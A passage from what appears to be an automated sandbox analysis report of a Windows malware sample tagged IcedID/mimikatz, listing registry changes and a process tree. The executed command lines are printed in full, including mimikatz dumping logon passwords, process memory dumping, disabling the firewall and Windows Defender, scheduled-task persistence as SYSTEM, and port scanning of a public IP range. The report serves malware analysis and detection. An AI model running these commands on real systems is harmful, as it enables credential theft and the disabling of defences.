= "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing puelpci.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" puelpci.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" puelpci.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" puelpci.exe -
Modifies registry class 14 IoCs
Processes:
puelpci.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" puelpci.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
puelpci.exepid process 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid process 680 680 680 680 680 680 680 680 680 680 680 680 680 680 680 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exepid process 2148 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exepuelpci.exepuelpci.exevfshost.exetvfbneign.exedlbkbn.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exedescription pid process Token: SeDebugPrivilege 2148 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 768 puelpci.exe Token: SeDebugPrivilege 4432 puelpci.exe Token: SeDebugPrivilege 3964 vfshost.exe Token: SeDebugPrivilege 5004 tvfbneign.exe Token: SeLockMemoryPrivilege 1820 dlbkbn.exe Token: SeLockMemoryPrivilege 1820 dlbkbn.exe Token: SeDebugPrivilege 2884 tvfbneign.exe Token: SeDebugPrivilege 4256 tvfbneign.exe Token: SeDebugPrivilege 2376 tvfbneign.exe Token: SeDebugPrivilege 1960 tvfbneign.exe Token: SeDebugPrivilege 1420 tvfbneign.exe Token: SeDebugPrivilege 4984 tvfbneign.exe Token: SeDebugPrivilege 1112 tvfbneign.exe Token: SeDebugPrivilege 224 tvfbneign.exe Token: SeDebugPrivilege 4376 tvfbneign.exe Token: SeDebugPrivilege 3132 tvfbneign.exe Token: SeDebugPrivilege 2200 tvfbneign.exe Token: SeDebugPrivilege 4564 tvfbneign.exe Token: SeDebugPrivilege 4816 tvfbneign.exe Token: SeDebugPrivilege 4660 tvfbneign.exe Token: SeDebugPrivilege 3128 tvfbneign.exe Token: SeDebugPrivilege 4252 tvfbneign.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exepuelpci.exepuelpci.exexohudmc.exepujbqc.exepuelpci.exepuelpci.exepid process 2148 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe 2148 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe 768 puelpci.exe 768 puelpci.exe 4432 puelpci.exe 4432 puelpci.exe 2088 xohudmc.exe 1748 pujbqc.exe 4460 puelpci.exe 4460 puelpci.exe 464 puelpci.exe 464 puelpci.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.execmd.exepuelpci.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid process target process PID 2148 wrote to memory of 2696 2148 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe cmd.exe PID 2148 wrote to memory of 2696 2148 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe cmd.exe PID 2148 wrote to memory of 2696 2148 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe cmd.exe PID 2696 wrote to memory of 688 2696 cmd.exe PING.EXE PID 2696 wrote to memory of 688 2696 cmd.exe PING.EXE PID 2696 wrote to memory of 688 2696 cmd.exe PING.EXE PID 2696 wrote to memory of 768 2696 cmd.exe puelpci.exe PID 2696 wrote to memory of 768 2696 cmd.exe puelpci.exe PID 2696 wrote to memory of 768 2696 cmd.exe puelpci.exe PID 4432 wrote to memory of 1860 4432 puelpci.exe cmd.exe PID 4432 wrote to memory of 1860 4432 puelpci.exe cmd.exe PID 4432 wrote to memory of 1860 4432 puelpci.exe cmd.exe PID 1860 wrote to memory of 4356 1860 cmd.exe cmd.exe PID 1860 wrote to memory of 4356 1860 cmd.exe cmd.exe PID 1860 wrote to memory of 4356 1860 cmd.exe cmd.exe PID 1860 wrote to memory of 4248 1860 cmd.exe cacls.exe PID 1860 wrote to memory of 4248 1860 cmd.exe cacls.exe PID 1860 wrote to memory of 4248 1860 cmd.exe cacls.exe PID 1860 wrote to memory of 4740 1860 cmd.exe cmd.exe PID 1860 wrote to memory of 4740 1860 cmd.exe cmd.exe PID 1860 wrote to memory of 4740 1860 cmd.exe cmd.exe PID 1860 wrote to memory of 3288 1860 cmd.exe cacls.exe PID 1860 wrote to memory of 3288 1860 cmd.exe cacls.exe PID 1860 wrote to memory of 3288 1860 cmd.exe cacls.exe PID 1860 wrote to memory of 1536 1860 cmd.exe cmd.exe PID 1860 wrote to memory of 1536 1860 cmd.exe cmd.exe PID 1860 wrote to memory of 1536 1860 cmd.exe cmd.exe PID 1860 wrote to memory of 4236 1860 cmd.exe cacls.exe PID 1860 wrote to memory of 4236 1860 cmd.exe cacls.exe PID 1860 wrote to memory of 4236 1860 cmd.exe cacls.exe PID 4432 wrote to memory of 3812 4432 puelpci.exe netsh.exe PID 4432 wrote to memory of 3812 4432 puelpci.exe netsh.exe PID 4432 wrote to memory of 3812 4432 puelpci.exe netsh.exe PID 4432 wrote to memory of 4736 4432 puelpci.exe netsh.exe PID 4432 wrote to memory of 4736 4432 puelpci.exe netsh.exe PID 4432 wrote to memory of 4736 4432 puelpci.exe netsh.exe PID 4432 wrote to memory of 3596 4432 puelpci.exe netsh.exe PID 4432 wrote to memory of 3596 4432 puelpci.exe netsh.exe PID 4432 wrote to memory of 3596 4432 puelpci.exe netsh.exe PID 4432 wrote to memory of 4068 4432 puelpci.exe cmd.exe PID 4432 wrote to memory of 4068 4432 puelpci.exe cmd.exe PID 4432 wrote to memory of 4068 4432 puelpci.exe cmd.exe PID 4068 wrote to memory of 3344 4068 cmd.exe wpcap.exe PID 4068 wrote to memory of 3344 4068 cmd.exe wpcap.exe PID 4068 wrote to memory of 3344 4068 cmd.exe wpcap.exe PID 3344 wrote to memory of 2628 3344 wpcap.exe net.exe PID 3344 wrote to memory of 2628 3344 wpcap.exe net.exe PID 3344 wrote to memory of 2628 3344 wpcap.exe net.exe PID 2628 wrote to memory of 2224 2628 net.exe net1.exe PID 2628 wrote to memory of 2224 2628 net.exe net1.exe PID 2628 wrote to memory of 2224 2628 net.exe net1.exe PID 3344 wrote to memory of 3744 3344 wpcap.exe net.exe PID 3344 wrote to memory of 3744 3344 wpcap.exe net.exe PID 3344 wrote to memory of 3744 3344 wpcap.exe net.exe PID 3744 wrote to memory of 3684 3744 net.exe net1.exe PID 3744 wrote to memory of 3684 3744 net.exe net1.exe PID 3744 wrote to memory of 3684 3744 net.exe net1.exe PID 3344 wrote to memory of 800 3344 wpcap.exe net.exe PID 3344 wrote to memory of 800 3344 wpcap.exe net.exe PID 3344 wrote to memory of 800 3344 wpcap.exe net.exe PID 800 wrote to memory of 2468 800 net.exe net1.exe PID 800 wrote to memory of 2468 800 net.exe net1.exe PID 800 wrote to memory of 2468 800 net.exe net1.exe PID 3344 wrote to memory of 2624 3344 wpcap.exe net.exe
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1784
-
C:\Windows\TEMP\irlfzpltl\dlbkbn.exe"C:\Windows\TEMP\irlfzpltl\dlbkbn.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
C:\Users\Admin\AppData\Local\Temp\2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ibimzzri\puelpci.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:688 -
C:\Windows\ibimzzri\puelpci.exeC:\Windows\ibimzzri\puelpci.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:768
-
C:\Windows\ibimzzri\puelpci.exeC:\Windows\ibimzzri\puelpci.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4356
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4248
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4740
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3288
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1536
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:4236
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:3812
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:4736
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:3596
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\btlbpeceu\hnkiaiely\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\btlbpeceu\hnkiaiely\wpcap.exeC:\Windows\btlbpeceu\hnkiaiely\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:2224
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:3684
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2468
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2624
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:1768
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:836
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4708
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1440
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2988
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3632
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\btlbpeceu\hnkiaiely\nfzqetiti.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\btlbpeceu\hnkiaiely\Scant.txt2⤵PID:4608
-
C:\Windows\btlbpeceu\hnkiaiely\nfzqetiti.exeC:\Windows\btlbpeceu\hnkiaiely\nfzqetiti.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\btlbpeceu\hnkiaiely\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2948 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\btlbpeceu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\btlbpeceu\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:3936 -
C:\Windows\btlbpeceu\Corporate\vfshost.exeC:\Windows\btlbpeceu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3964 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tbimbbnti" /ru system /tr "cmd /c C:\Windows\ime\puelpci.exe"2⤵PID:2104
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:228
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tbimbbnti" /ru system /tr "cmd /c C:\Windows\ime\puelpci.exe"3⤵
- Creates scheduled task(s)
PID:1912 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zzyqhbinn" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F"2⤵PID:2040
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2044
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zzyqhbinn" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4872 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pgncswiue" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F"2⤵PID:2384
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2296
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "pgncswiue" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:2324 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:4376
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:4536
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:2088
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:1748
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:2612
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 804 C:\Windows\TEMP\btlbpeceu\804.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5004 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:3308
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4252
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:3144
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:3044
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:4020
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:5036
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:1380
-
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 412 C:\Windows\TEMP\btlbpeceu\412.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2884 -
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:4284
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:5016
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:220
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:3100
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:4356 -
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:2660
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:1732 -
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:2200
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:1612
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:4664
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:2540
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:1428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:5012
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:3748
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:3584
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:4816
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:4728
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:3788 -
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:2044
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:3400 -
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:4936
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:4536 -
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:2296
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:3156 -
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:2088 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 1784 C:\Windows\TEMP\btlbpeceu\1784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4256 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 2432 C:\Windows\TEMP\btlbpeceu\2432.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2376 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 2596 C:\Windows\TEMP\btlbpeceu\2596.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1960 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 2728 C:\Windows\TEMP\btlbpeceu\2728.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1420 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 3192 C:\Windows\TEMP\btlbpeceu\3192.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4984 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 3928 C:\Windows\TEMP\btlbpeceu\3928.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1112 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 4044 C:\Windows\TEMP\btlbpeceu\4044.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:224 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 896 C:\Windows\TEMP\btlbpeceu\896.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4376 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 1108 C:\Windows\TEMP\btlbpeceu\1108.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3132 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 3312 C:\Windows\TEMP\btlbpeceu\3312.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2200 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 2480 C:\Windows\TEMP\btlbpeceu\2480.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4564 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 4152 C:\Windows\TEMP\btlbpeceu\4152.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4816 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 3120 C:\Windows\TEMP\btlbpeceu\3120.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4660 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 3828 C:\Windows\TEMP\btlbpeceu\3828.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3128 -
C:\Windows\TEMP\btlbpeceu\tvfbneign.exeC:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 2896 C:\Windows\TEMP\btlbpeceu\2896.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4252 -
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\btlbpeceu\hnkiaiely\scan.bat2⤵PID:4068
-
